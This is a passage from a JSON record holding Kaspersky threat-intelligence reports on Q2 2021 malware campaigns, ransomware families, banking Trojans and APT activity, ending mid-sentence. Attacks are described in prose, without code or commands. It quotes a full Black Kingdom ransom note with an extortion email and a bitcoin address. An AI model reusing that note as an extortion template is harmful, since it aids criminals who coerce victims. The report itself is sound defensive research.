kernel.\n\nOn April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday.\n\nThe exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a &quot;remote shell&quot;-style backdoor, which in turns connects to the C2 to get commands.\n\nWe weren&#x27;t able to find any connections or overlaps with a known threat actor, so we tentatively named this cluster of activity [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\n### Andariel adds ransomware to its toolset\n\nIn April, we discovered a suspicious Word document containing a Korean file name and decoy uploaded to VirusTotal. The document contained an unfamiliar macro and used novel techniques to implant the next payload. Our telemetry revealed two infection methods used in these attacks, with each payload having its own loader for execution in memory. The threat actor only delivered the final stage payload for selected victims.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15094853/Andariel_delivered_ransomware_01.png>)\n\nDuring the course of our research, Malwarebytes published a [report](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/>) with technical details about the same series of attacks, which attributed it to the Lazarus group. However, after thorough analysis, we reached the conclusion that the attacks were the work of Andariel, a sub-group of Lazarus, based on code overlaps between the second stage payload in this campaign and previous malware from this threat actor.\n\nHistorically, Andariel has mainly targeted organizations in South Korea; and our telemetry suggests that this is also the case in this campaign. We confirmed several victims in the manufacturing, home network service, media and construction sectors.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15095550/Andariel_delivered_ransomware_08.png>)\n\nWe also found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase of an attack. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity.\n\nNotably, in addition to the final backdoor, we discovered one victim infected with custom ransomware, underlying the financial motivation of this threat actor.\n\n### Ferocious Kitten\n\n[Ferocious Kitten](<https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/>) is an APT threat actor that has targeted Persian-speaking individuals who appear to be based in Iran. The group has mostly operated under the radar and, as far as we know, has not been covered by security researchers. The threat actor attracted attention recently when a lure document was uploaded to VirusTotal and went public thanks to [researchers on Twitter](<https://twitter.com/reddrip7/status/1366703445990723585?s=21>). Since then, one of its implants [has been analyzed](<http://www.hackdig.com/03/hack-293629.htm>) by a Chinese threat intelligence firm.\n\nWe were able to expand on some of the findings about the group and provide insights into the additional variants that it uses. The malware dropped from the lure document, dubbed &quot;MarkiRAT&quot;, records keystrokes, clipboard content, and provides file download and upload capabilities as well as the ability to execute arbitrary commands on the victim&#x27;s computer. We were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of Telegram and Chrome applications as a persistence method.\n\nFerocious Kitten is one of the groups that operate in a wider eco-system intended to track individuals in Iran. Such threat groups aren&#x27;t reported very often; and so are able to re-use infrastructure and toolsets without worrying about them being taken down or flagged by security solutions. Some of the TTPs used by this threat actor are reminiscent of other groups that are active against a similar set of targets, such as Domestic Kitten and Rampant Kitten.\n\n## Other malware\n\n### Evolution of JSWorm ransomware\n\nWhile ransomware has been around for a long time, it has evolved over time as attackers have improved their technologies and refined their tactics. We have seen a shift away from the random, speculative attacks of five years ago, and even from the massive outbreaks such as [WannaCry](<https://securelist.com/wannacry-faq-what-you-need-to-know-today/78411/>) and [NotPetya](<https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/>). Many ransomware gangs have switched to the more profitable tactic of &quot;big-game hunting&quot;; and news of ransomware attacks affecting large corporations, and even critical infrastructure installations, has become commonplace. Moreover, there&#x27;s now a [well-developed eco-system underpinning ransomware attacks](<https://securelist.com/ransomware-world-in-2021/102169/>).\n\nAs a result, even though [the number of ransomware attacks has fallen](<https://securelist.com/ransomware-by-the-numbers-reassessing-the-threats-global-impact/101965/>), and individuals are probably less likely to encounter ransomware than a few years ago, the threat to organizations is greater than ever.\n\nWe recently published analysis of one such ransomware family, named [JSWorm](<https://securelist.com/evolution-of-jsworm-ransomware/102428/>). This malware was discovered in 2019, and since then different variants have gained notoriety under various names such as Nemty, Nefilim, Offwhite and others.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24115814/JSworm_malware_01.png>)\n\nEach &quot;re-branded&quot; version has included alterations to different aspects of the code \u2013 file extensions, cryptographic schemes, encryption keys, programming language and distribution model. Since it emerged, JSWorm has developed from a typical mass-scale ransomware threat affecting mostly individual users into a typical big-game hunting ransomware threat attacking high-profile targets and demanding massive ransom payments.\n\n### Black Kingdom ransomware\n\n[Black Kingdom](<https://securelist.com/black-kingdom-ransomware/102873/>) first appeared in 2019; in 2020 the group was observed exploiting vulnerabilities (such as CVE-2019-11510) in its attacks. In recent activity, the ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065, aka [ProxyLogon](<https://proxylogon.com/>)). This ransomware family is much less sophisticated than other [Ransomware-as-a-Service](<https://encyclopedia.kaspersky.com/glossary/ransomware-as-a-service-raas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (RaaS) or big game hunting families. The group&#x27;s involvement in the Microsoft Exchange exploitation campaign suggests opportunism rather than a resurgence in activity from this ransomware family.\n\nThe malware is coded in Python and compiled to an executable using PyInstaller. The ransomware supports two encryption modes: one generated dynamically and one using a hardcoded key. Code analysis revealed an amateurish development cycle and the possibility of recovering files that have been encrypted with Black Kingdom with the help of the hardcoded key. At the time of analysis, there was already a [script to recover files encrypted with the embedded key](<https://blog.cyberint.com/black-kingdom-ransomware>).\n\nBlack Kingdom changes the desktop background to a note that the system is infected while it encrypts files, disabling the mouse and keyboard as it does so.\n \n \n ***************************\n | We Are Back ?\n ***************************\n \n We hacked your (( Network )), and now all files, documents, images,\n databases and other important data are safely encrypted using the strongest algorithms ever.\n You cannot access any of your files or services .\n But do not worry. You can restore everthing and get back business very soon ( depends on your actions )\n \n before I tell how you can restore your data, you have to know certain things :\n \n We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public.\n \n To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware )\n \n ***************************\n | What guarantees ?\n ***************************\n \n We understand your stress and anxiety. So you have a free opportunity to test our service by instantly decrypting one or two files for free\n just send the files you want to decrypt to (support_blackkingdom2@protonmail.com\n \n ***************************************************\n | How to contact us and recover all of your files ?\n ***************************************************\n \n The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses .\n \n \n [ + ] Instructions:\n \n 1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com\n \n 2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address :\n \n [ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ]\n \n 3- confirm your payment by sending the transfer url to our email address\n \n 4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you,\n so that you can recover all your files.\n \n ## Note ##\n \n Dear system administrators, do not think you can handle it on your own. Notify your supervisors as soon as possible.\n By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites.\n \n Your ID ==>\n FDHJ91CUSzXTquLpqAnP\n\nAfter decompiling the Python code, we discovered that the code base for Black Kingdom has its origins in an open-source ransomware builder [available on GitHub](<https://github.com/BuchiDen/Ransomware_RAASNet/blob/master/RAASNet.py>). The group adapted parts of the code, adding features that were not originally presented in the builder, such as the hardcoded key. We were not able to attribute Black Kingdom to any known threat group.\n\nBased on our telemetry, we could see only a few hits by Black Kingdom in Italy and Japan.\n\n### Gootkit: the cautious banking Trojan\n\n[Gootkit](<https://securelist.com/gootkit-the-cautious-trojan/102731/>) belongs to a class of Trojans that are extremely tenacious, but not widespread. Since it&#x27;s not very common, new versions of the Trojan may remain under the researchers&#x27; radar for long periods.\n\nIt is complex multi-stage banking malware, which was initially discovered by Doctor Web in 2014. Initially, it was distributed via spam and exploits kits such as Spelevo and RIG. In conjunction with spam campaigns, the adversaries later switched to compromised websites where visitors are tricked into downloading the malware.\n\nGootkit is capable of stealing data from the browser, performing man-in-the-browser attacks, keylogging, taking screenshots, and lots of other malicious actions. The Trojan&#x27;s loader performs various virtual machine and sandbox checks and uses sophisticated persistence algorithms.\n\nIn 2019, Gootkit stopped operating after it experienced a [data leak](<https://www.zdnet.com/article/gootkit-malware-crew-left-their-database-exposed-online-without-a-password/>), but has been [active again](<https://www.bleepingcomputer.com/news/security/gootkit-malware-returns-to-life-alongside-revil-ransomware/>) since November 2020. Most of the victims are located in EU countries such as Germany and Italy.\n\n### Bizarro banking Trojan expands into Europe\n\nBizarro is one more banking Trojan family originating from Brazil that is now found in other parts of the world. We have seen people being targeted in Spain, Portugal, France and Italy. This malware has been used to steal credentials from customers of 70 banks from different European and South American countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143631/Bizarro_trojan_13.png>)\n\nAs with [Tetrade](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>), Bizarro uses affiliates or recruits money mules to cash out or simply to help with money transfers.\n\nBizarro is distributed via MSI packages downloaded by victims from links in spam emails. Once launched, it downloads a ZIP archive from a compromised website. We observed hacked WordPress, Amazon and Azure servers used by the Trojan for storing archives. The backdoor, which is the core component of Bizarro, contains more than 100 commands and allows the attackers to steal online banking account credentials. Most of the commands are used to display fake pop-up messages and seek to trick people into entering two-factor authentication codes. The Trojan may also use social engineering to convince victims to download a smartphone app.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143359/Bizarro_trojan_12.png>)\n\nBizarro is one of several banking Trojans from South America that have extended their operations into other regions \u2013 mainly Europe. They include Guildma, Javali, Melcoz, Grandoreiro and Amavaldo.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/17095011/Map_of_Brazilian_families.jpeg>)\n\n### Malicious code in APKPure app\n\nIn early April, we [discovered malicious code in version 3.17.18 of the official client of the APKPure app store](<https://securelist.com/apkpure-android-app-store-infected/101845/>), a popular alternative source of Android apps. [The incident seems to be similar to what happened with CamScanner](<https://www.kaspersky.com/blog/camscanner-malicious-android-app/28156/>), when the app&#x27;s developer implemented an adware SDK from an unverified source.\n\nWhen launched, the embedded Trojan dropper, which our solutions detect as HEUR:Trojan-Dropper.AndroidOS.Triada.ap, unpacks and runs its payload, which is able to show ads on the lock screen, open browser tabs, collect information about the device, and download other malicious code. The Trojan downloaded depends on the version of Android and how recently security updates have been installed. In the case of relatively recent versions of the operating system (Android 8 or higher) it loads additional modules for the [Triada Trojan](<https://www.kaspersky.com/blog/triada-trojan/11481/>). If the device is older (Android 6 or 7, and without security updates installed) it could be the [xHelper Trojan](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>).\n\nWe reported the issue to APKPure on April 8. APKPure acknowledged the problem the following day and, soon afterwards, posted a new version (3.17.19) that does not contain the malicious component.\n\n### Browser lockers\n\nBrowser lockers are designed to prevent the victim from using their browser unless they pay a ransom. The &quot;locking&quot; consists of preventing the victim from leaving the current tab, which displays intimidating messages, often with sound and visual effects. The locker tries to trick the victim into making a payment with threats of losing data or legal liability.\n\nThis type of fraud has long been on the radar of researchers, and over the last decade there have been numerous browser locking campaigns targeting people worldwide. The tricks used by the scammers include imitating the infamous &quot;[Blue Screen of Death](<https://encyclopedia.kaspersky.com/glossary/blue-screen-of-death-bsod/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)&quot; (BSOD) in the browser, false warnings about system errors or detected malware, threats to encrypt files and legal liability notices.\n\nIn our [report on browser lockers](<https://securelist.com/browser-lockers-extortion-disguised-as-a-fine/101735/>), we examined two families of lockers that mimic government websites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01145253/MVD_fake_sites_07-scaled.jpeg>)\n\nBoth families spread mainly via advertising networks, primarily aimed at selling &quot;adult&quot; content and movies in an intrusive manner; for example, through tabs or windows that open on top of the visited site when loading a page with an embedded ad module (pop-ups), or after clicking anywhere on the page (click-unders).\n\nThese threats are not technically complex: they simply aim to create the illusion of having locked the computer and intimidate victims into paying money. Landing on such a page by mistake will not harm your device or compromise your data, as long as you don&#x27;t fall for the cybercriminals&#x27; smoke-and-mirror tactics.\n\n### Malware targets Apple M1 chip\n\nLast November, Apple unveiled its M1 chip. The new chip, which has replaced Intel processors in several of its products, is based on ARM architecture instead of the x86 architecture traditionally used in personal computers. This lays the foundation for Apple to switch completely to its own processors and unify its software under a single architecture. Unfortunately, just months after the release, [malware writers had already adapted several malware families to the new processor](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>).\n\n### Attempted supply-chain attack using PHP\n\nIn March, [unknown attackers tried to carry out a supply-chain attack by introducing malicious code to the PHP scripting language](<https://www.kaspersky.com/blog/php-git-backdor/39191/>). The developers of PHP make changes to the code using a common repository built on the GIT version control system. The attackers tried to add a backdoor to the code. Fortunately, a developer noticed something suspicious during a routine check. Had they not done so, the backdoor might have allowed attackers to run malicious code remotely on web servers, in around 80 per cent of which (web servers) PHP is used.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-08-12T10:00:37", "type": "securelist", "title": "IT threat evolution Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0802", "CVE-2019-11510", "CVE-2021-1732", "CVE-2021-27065", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-08-12T10:00:37", "id": "SECURELIST:934E8AA177A27150B87EC15F920BF350", "href": "https://securelist.com/it-threat-evolution-q2-2021/103597/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-04T10:41:58", "description": "\n\nFor more than four years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q2 2021.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nInvestigating the recent Microsoft Exchange vulnerabilities we and our colleagues from AMR found an attacker deploying a previously unknown backdoor, &quot;FourteenHi&quot;, in a campaign that we dubbed ExCone, active since mid-March. During our investigation we revealed multiple tools and variants of FourteenHi, configured with infrastructure that FireEye reported as being related to the UNC2643 activity cluster. Moreover, we saw ShadowPad detections coincide with FourteenHi variant infections, possibly hinting at a shared operator between these two malware families.\n\nFourteenHi abuses the popular VLC media player to execute its loader. It is capable of performing basic backdoor functions. Further investigation also revealed scripts used by the actor to gain situational awareness post-exploitation, as well as previous use of the infrastructure to operate Cobalt Strike Beacon.\n\nAlthough we couldn&#x27;t directly attribute this activity to any known threat actor, we found older, highly similar 64-bit samples of the backdoor used in close proximity with ShadowPad malware, mostly known for its operations involving supply-chain attacks as an infection vector. Notably, we also found one C2 IP used in a 64-bit sample reportedly used in the UNC2643 activity set, associated with the HAFNIUM threat actor, also using Cobalt Strike, DLL side-loading and exploiting the same Exchange vulnerabilities.\n\n## Russian-speaking activity\n\nOn May 27 and 28, details regarding an ongoing email campaign against diplomatic entities throughout Europe and North America were released by Volexity and Microsoft. These attacks were attributed to Nobelium and APT29 by Microsoft and Volexity respectively. While we were able to verify the malware and possible targeting for this cluster of activity, we haven&#x27;t been able to make a definitive assessment at this time about which threat actor is responsible, although we found ties to Kazuar. We have designated it as a new threat actor and named it &quot;HotCousin&quot;. The attacks began with a spear-phishing email which led to an ISO file container being stored on disk and mounted. From here, the victim was presented with a LNK file made to look like a folder within an Explorer window. If the victim double clicked on it, the LNK then executed a loader written in .NET referred to as BoomBox, or a DLL. The execution chain ultimately ended with a Cobalt Strike beacon payload being loaded into memory. According to public blogs, targeting was widespread but focused primarily on diplomatic entities throughout Europe and North America: based on the content of the lure documents bundled with the malware, this assessment appears to be accurate. This cluster of activity was conducted methodically beginning in January with selective targeting and slow operational pace, then ramping up and ending in May. There are indications of previous activity from this threat actor dating back to at least October 2020, based on other Cobalt Strike payloads and loaders bearing similar toolmarks.\n\n## Chinese-speaking activity\n\nWhile investigating a recent rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. This cluster stood out because it used a formerly unknown Windows kernel mode rootkit and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers. The former is used to hide the user mode malware&#x27;s artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open source project named &quot;Cheat Engine&quot; to bypass the Windows Driver Signature Enforcement mechanism. We were able to determine that this toolset had been in use from as early as July 2020; and that the threat actor was mostly focused on Southeast Asian targets, including several governmental entities and telecoms companies. Since this was a long-standing operation, with high-profile victims, an advanced toolset and no affinity to a known threat actor, we decided to name the underlying cluster &quot;GhostEmperor&quot;.\n\nAPT31 (aka ZIRCONIUM) is a Chinese-speaking intrusion set. This threat actor set up an ORB (Operational Relay Boxes) infrastructure, composed of several compromised SOHO routers, to target entities based in Europe (and perhaps elsewhere). As of the publication of our report in May, we had seen these ORBs used to relay Cobalt Strike communications and for anonymization proxying purposes. It is likely that APT31 uses them for other implants and ends as well (for example, exploit or malware staging). Most of the infrastructure put in place by APT31 comprises compromised Pakedge routers (RK1, RE1 and RE2). This little-known constructor specializes in small enterprise routers and network devices. So far, we don&#x27;t know which specific vulnerability has been exploited by the intrusion set to compromise the routers. Nor do we currently possess telemetry that would provide further visibility into this campaign. We will, of course, continue to track these activities.\n\nFollowing our previous report on EdwardsPheasant, DomainTools and BitDefender published articles about malicious activities against targets in Southeast Asia which we believe, with medium to high confidence, are parts of EdwardsPheasant campaigns. While tracking the activities of this threat actor, analyzing samples discovered or provided by third parties, and investigating from public IoCs, we discovered an updated DropPhone implant, an additional implant loaded by FoundCore&#x27;s shellcode, several possible new infection documents and malicious domain names, as well as additional targets. While we do not believe we have a complete picture of this set of activities yet, our report this quarter marks a significant step further in understanding its extent.\n\nA Chinese-speaking APT compromised a certificate authority in Mongolia and replaced digital certificate management client software with a malicious downloader in February. We are tracking this group as BountyGlad. Related infrastructure was identified and used in multiple other incidents: interesting related activity included server-side attacks on WebSphere and WebLogic services in Hong Kong; and on the client-side, Trojanized Flash Player installers. The group demonstrated an increase in strategic sophistication with this supply-chain attack. While replacing a legitimate installer on a high value website like a certificate authority requires a medium level of skill and coordination, the technical sophistication is not on par with ShadowHammer. And while the group deploys fairly interesting, but simplistic, steganography to cloak its shellcode, we think it was probably generated with code that has been publicly available for years. Previous activity also connected with this group relied heavily on spear-phishing and Cobalt Strike throughout 2020. Some activity involved PowerShell commands and loader variants different from the downloaders presented in our recent report. In addition to spear-phishing, the group appears to rely on publicly available exploits to penetrate unpatched target systems. They use implants and C2 (Command and Control) code that are a mix of both publicly available and privately shared across multiple Chinese-speaking APTs. We are able to connect infrastructure across multiple incidents. Some of those were focused on Western targets in 2020. Some of the infrastructure listed in an FBI Flash alert published in May 2020, targeting US organizations conducting COVID-19 research, was also used by BountyGlad.\n\nWhile investigating users infected with the TPCon backdoor, previously discussed in a private report, we detected loaders which are part of a new multi-plugin malware framework that we named &quot;QSC&quot;, which allows attackers to load and run plugins in-memory. We attribute the use of this framework to Chinese-speaking groups, based on some overlaps in victimology and infrastructure with other known tools used by these groups. We have so far observed the malware loading a Command shell and File Manager plugins in-memory. We believe the framework has been used in the wild since April 2020, based on the compilation timestamp of the oldest sample found. However, our telemetry suggests that the framework is still in use: the latest activity we detected was in March this year.\n\nEarlier this month, Rostelecom Solar and NCIRCC issued a joint public report describing a series of attacks against networks of government entities in Russia. The report described a formerly unknown actor leveraging an infection chain that leads to the deployment of two implants - WebDav-O and Mail-O. Those, in conjunction with other post-exploitation activity, have led to network-wide infections in the targeted organizations that resulted in exfiltration of sensitive data. We were able to trace the WebDav-O implant&#x27;s activity in our telemetry to at least 2018, indicating government affiliated targets based in Belarus. Based on our investigation, we were able to find additional variants of the malware and observe some of the commands executed by the attackers on the compromised machines.\n\nWe discovered a cluster of activity targeting telecom operators within a specific region. The bulk of this activity took place from May to October 2020. This activity made use of several malware families and tools; but the infrastructure, a staging directory, and in-country target profiles tie them together. The actors deployed a previously unknown passive backdoor, that we call &quot;TPCon&quot;, as a primary implant. It was later used to perform both reconnaissance within target organizations and to deploy a post-compromise toolset made up mostly of publicly available tools. We also found other previously unknown active backdoors, that we call &quot;evsroin&quot;, used as secondary implants. Another interesting find was a related loader (found in a staging directory) that loaded a KABA1 implant variant. KABA1 was an implant used against targets throughout the South China Sea that we attributed to the Naikon APT back in 2016. On another note, on the affected hosts we found additional multiple malware families shared by Chinese-speaking actors, such as ShadowPad and Quarian backdoors. These did not seem to be directly connected to the TPCon/evsroin incidents because the supporting infrastructure appeared to be completely separate. One of the ShadowPad samples appears to have been detected in 2020, while the others were detected well before that, in 2019. Besides the Naikon tie, we found some overlaps with previously reported IceFog and IamTheKing activities.\n\n## Middle East\n\nBlackShadow is a threat group that became known after exfiltrating sensitive documents from Shirbit, an Israeli insurance company, and demanding a ransom in exchange for not releasing the information in its possession. Since then, the group has made more headlines, breaching another company in Israel and publishing a trove of documents containing customer related information on Telegram. Following this, we found several samples of the group&#x27;s unique .NET backdoor in our telemetry that were formerly unknown to us, one of which was recently detected in Saudi Arabia. By pivoting on new infrastructure indicators that we observed in those samples, we were able to find a particular C2 server that was contacted by a malicious Android implant and shows ties to the group&#x27;s activity.\n\nWe previously covered a WildPressure campaign against targets in the Middle East . Keeping track of the threat actor&#x27;s malware this spring, we were able to find a newer version (1.6.1) of their C++ Trojan, a corresponding VBScript variant with the same version and a completely new set of modules, including an orchestrator and three plugins. This confirms our previous assumption that there are more last-stagers besides the C++ ones, based on one of the fields in the C2 communication protocol which contains the &quot;client&quot; programming language. Another language used by WildPressure is Python. The PyInstaller module for Windows contains a script named &quot;Guard&quot;. Perhaps the most interesting finding here is that this malware was developed for both Windows and macOS operating systems. In this case, the hardcoded version is 2.2.1. The coding style, overall design and C2 communication protocol is quite recognisable across all programming languages used by the attackers. The malware used by WildPressure is still under active development in terms of versions and programming languages in use. Although we could not associate WildPressure&#x27;s activity with other threat actors, we did find minor similarities in the TTPs (Tactics, Techniques and Procedures) used by BlackShadow, which is also active in the same region. However, we consider that these similarities serve as minor ties and are not enough to make any attribution.\n\nWe discovered an ongoing campaign that we attribute to an actor named WIRTE, beginning in late 2019, targeting multiple sectors, focused on the Middle East. WIRTE is a lesser-known threat actor first publicly referenced in 2019, which we suspect has relations with the Gaza Cybergang threat actor group. During our hunting efforts, in February, for threat actor groups that are using VBS/VBA implants, we came across MS Excel droppers that use hidden spreadsheets and VBA macros to drop their first stage implant - a VBS script. The VBS script&#x27;s main function is to collect system information and execute arbitrary code sent by the attackers. Although we recently reported on a new Muddywater first stage VBS implant used for reconnaissance and profiling activities, these intrusion sets have slightly different TTPs and wider targeting. To date, we have recorded victims focused in the Middle East and a few other countries outside this region. Despite various industries being affected, the focus was mainly towards government and diplomatic entities; however, we also noticed an unusual targeting of law firms.\n\nGoldenJackal is the name we have given to a cluster of activity, recently discovered in our telemetry, that has been active since November 2019. This intrusion set consists of a set of .NET-based implants that are intended to control victim machines and exfiltrate certain files from them, suggesting that the actor&#x27;s primary motivation is espionage. Furthermore, the implants were found in a restricted set of machines associated with diplomatic entities in the Middle East. Analysis of the aforementioned malware, as well as the accompanied detection logs, portray a capable and moderately stealthy actor. This can be substantiated by the successful foothold gained by the underlying actor in the few organizations we came across, all the while keeping a low signature and ambiguous footprint.\n\n## Southeast Asia and Korean Peninsula\n\nThe ScarCruft group is a geo-political motivated APT group that usually attacks government entities, diplomats and individuals associated with North Korean affairs. Following our last report about this group, we had not seen its activities for almost a year. However, we observed that ScarCruft compromised a North Korea-related news media website in January, beginning a campaign that was active until March. The attackers utilized the same exploit chains, CVE-2020-1380 and CVE-2020-0986, also used in [Operation Powerfall](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>). Based on the exploit code and infection scheme characteristics, we suspect that Operation PowerFall has a connection with the ScarCruft group. The exploit chain contains several stages of shellcode execution, finally deploying a Windows executable payload in memory. We discovered several victims from South Korea and Singapore. Besides this watering-hole attack, this group also used Windows executable malware concealing its payload. This malware, dubbed &quot;ATTACK-SYSTEM&quot;, also used multi-stage shellcode infection to deliver the same final payload named &quot;BlueLight&quot;. BlueLight uses OneDrive for C2. Historically, ScarCruft malware, especially RokRat, took advantage of personal cloud servers as C2 servers, such as pCloud, Box, Dropbox, and Yandex.\n\nIn May 2020, the Criminal Investigation Bureau (CIB) of Taiwan published an announcement about an attack targeting Taiwanese legislators. Based on their information, an unknown attacker sent spear-phishing emails using a fake presidential palace email account, delivering malware we dubbed &quot;Palwan&quot;. Palwan is malware capable of performing basic backdoor functionality as well as downloading further modules with additional capabilities. Analysing the malware, we discovered another campaign, active in parallel, targeting Nepal. We also found two more waves of attacks launched against Nepal in October 2020 and in January this year using Palwan malware variants. We suspect that the targeted sector in Nepal is similar to the one reported by the CIB of Taiwan. Investigating the infrastructure used in the Nepal campaigns, we spotted an overlap with Dropping Elephant activity. However, we don&#x27;t deem this overlap sufficient to attribute this activity to the Dropping Elephant threat actor.\n\nBlueNoroff is a long-standing, financially motivated APT group that has been targeting the financial industry for years. In recent operations, the group has focused on cryptocurrency businesses. Since the publication of our research of BlueNoroff&#x27;s &quot;SnatchCrypto&quot; campaign in 2020, the group&#x27;s strategy to deliver malware has evolved. In this campaign, BlueNoroff used a malicious Word document exploiting CVE-2017-0199, a remote template injection vulnerability. The injected template contains a Visual Basic script, which is responsible for decoding the next payload from the initial Word document and injecting it into a legitimate process. The injected payload creates a persistent backdoor on the victim&#x27;s machine. We observed several types of backdoor. For further surveillance of the victim, the malware operator may also deploy additional tools. BlueNoroff has notably set up fake blockchain, or cryptocurrency-related, company websites for this campaign, to lure potential victims and initiate the infection process. Numerous decoy documents were used, which contain business and nondisclosure agreements as well as business introductions. When compared to the previous SnatchCrypto campaign, the BlueNoroff group utilized a similar backdoor and PowerShell agent but changed the initial infection vector. Windows shortcut files attached to spear-phishing emails used to be the starting point for an infection: they have now been replaced by weaponized Word documents.\n\nWe have discovered [Andariel activity](<https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/>) using a revised infection scheme and custom ransomware targeting a broad spectrum of industries located in South Korea. In April, we observed a suspicious document containing a Korean file name and decoy uploaded to VirusTotal. It revealed a novel infection scheme and an unfamiliar payload. During the course of our research, Malwarebytes published a report with technical details about the same series of attacks, which attributed it to the Lazarus group. After a deep analysis we reached a different conclusion - that the Andariel group was behind these attacks. Code overlaps between the second stage payload in this campaign and previous malware from the Andariel group allowed for this attribution. Apart from the code similarity and the victimology, we found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity. The threat actor has been spreading the third stage payload since the middle of 2020 and leveraged malicious Word documents and files mimicking PDF documents as infection vectors. Notably, in addition to the final backdoor, we discovered one victim infected with custom ransomware. This ransomware adds another facet to this Andariel campaign, which also sought financial profit in a previous operation involving the compromise of ATMs.\n\nWe recently uncovered a large-scale and highly active attack in Southeast Asia coming from a threat actor we dubbed [LuminousMoth](<https://securelist.com/apt-luminousmoth/103332/>). Further analysis revealed that this malicious activity dates back to October 2020 and was still ongoing at the time we reported it in June. LuminousMoth takes advantage of DLL sideloading to download and execute a Cobalt Strike payload. However, perhaps the most interesting part of this attack is its capability to spread to other hosts by infecting USB drives. In addition to the malicious DLLs, the attackers also deployed a signed, but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate files; and an additional tool that accesses a victim&#x27;s Gmail session by stealing cookies from the Chrome browser. Infrastructure ties as well as shared TTPs allude to a possible connection between LuminousMoth and the HoneyMyte threat group, which was seen targeting the same region and using similar tools in the past. Most early sightings of this activity were in Myanmar, but it now appears that the attackers are much more active in the Philippines, where the number of known attacks has grown more than tenfold. This raises the question of whether this is caused by a rapid replication through removable devices or by an unknown infection vector, such as a watering-hole focusing on the Philippines.\n\nWe recently reported SideCopy campaigns attacking the Windows platform together with Android-based implants. These implants turned out to be multiple applications working as information stealers to collect sensitive information from victims&#x27; devices, such as contact lists, SMS messages, call recordings, media and other types of data. Following up, we discovered additional malicious Android applications, some of them purporting to be known messaging apps like Signal or an adult chat platform. These newly discovered applications use the Firebase messaging service as a channel to receive commands. The operator is able to control if either Dropbox or another, hard coded server is used to exfiltrate stolen files.\n\n## Other interesting discoveries\n\nExpanding our research on the exploit targeting CVE-2021-1732, originally discovered by DBAPPSecurity Threat Intelligence Center and used by the Bitter APT group, [we discovered another possible zero-day exploit used in the Asia-Pacific (APAC) 